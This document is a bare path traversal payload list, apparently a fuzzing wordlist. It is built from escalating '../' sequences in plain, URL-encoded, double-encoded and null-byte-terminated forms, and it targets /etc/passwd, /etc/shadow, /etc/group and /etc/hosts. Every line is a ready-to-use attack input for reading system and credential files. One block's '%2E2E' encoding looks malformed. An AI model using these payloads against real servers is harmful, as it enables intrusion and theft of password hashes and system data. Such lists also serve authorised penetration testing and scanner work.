//etc/passwd
//etc/passwd%00
////etc/passwd
////etc/passwd%00
%252fetc%252fpasswd
%252fetc%252fpasswd%00
%c0%ae/etc/passwd
%c0%ae/etc/passwd%00
/%5C../etc/passwd
/%5C../etc/passwd%00
....//etc/passwd
....//....//etc/passwd
file:///etc/passwd%00
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
%2Fetc/passwd
..%2Fetc/passwd
..%2F..%2Fetc/passwd
..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
%2Fetc/passwd%00
..%2Fetc/passwd%00
..%2F..%2Fetc/passwd%00
..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd%00
%2Fetc%2Fpasswd
%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd
%2Fetc%2Fpasswd%00
%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2F%2E2E%2Fetc%2Fpasswd%00
%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252fetc%252fpasswd%00
%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
/etc/shadow
../etc/shadow
../../etc/shadow
../../../etc/shadow
../../../../etc/shadow
../../../../../etc/shadow
../../../../../../etc/shadow
../../../../../../../etc/shadow
../../../../../../../../etc/shadow
../../../../../../../../../etc/shadow
../../../../../../../../../../etc/shadow
../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../etc/shadow
/etc/group
../etc/group
../../etc/group
../../../etc/group
../../../../etc/group
../../../../../etc/group
../../../../../../etc/group
../../../../../../../etc/group
../../../../../../../../etc/group
../../../../../../../../../etc/group
../../../../../../../../../../etc/group
../../../../../../../../../../../etc/group
../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../etc/group
/etc/shadow%00
../etc/shadow%00
../../etc/shadow%00
../../../etc/shadow%00
../../../../etc/shadow%00
../../../../../etc/shadow%00
../../../../../../etc/shadow%00
../../../../../../../etc/shadow%00
../../../../../../../../etc/shadow%00
../../../../../../../../../etc/shadow%00
../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../etc/shadow%00
/etc/group%00
../etc/group%00
../../etc/group%00
../../../etc/group%00
../../../../etc/group%00
../../../../../etc/group%00
../../../../../../etc/group%00
../../../../../../../etc/group%00
../../../../../../../../etc/group%00
../../../../../../../../../etc/group%00
../../../../../../../../../../etc/group%00
../../../../../../../../../../../etc/group%00
../../../../../../../../../../../../etc/group%00
../../../../../../../../../../../../../etc/group%00
../../../../../../../../../../../../../../etc/group%00
/etc/hosts
../etc/hosts
../../etc/hosts
../../../etc/hosts
../../../../etc/hosts
../../../../../etc/hosts
../../../../../../etc/hosts
../../../../../../../etc/hosts
../../../../../../../../etc/hosts
../../../../../../../../../etc/hosts
../../../../../../../../../../etc/hosts
../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../../../etc/hosts
/etc/hosts%00
../etc/hosts%00
../../etc/hosts%00
../../../etc/hosts%00
../../../../etc/hosts%00
../../../../../etc/hosts%00
../../../../../../etc/hosts%00
../../../../../../../etc/hosts%00
../../../../../../../../etc/hosts%00
../../../../../../../../../etc/hosts%00
../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../../../etc/hosts%00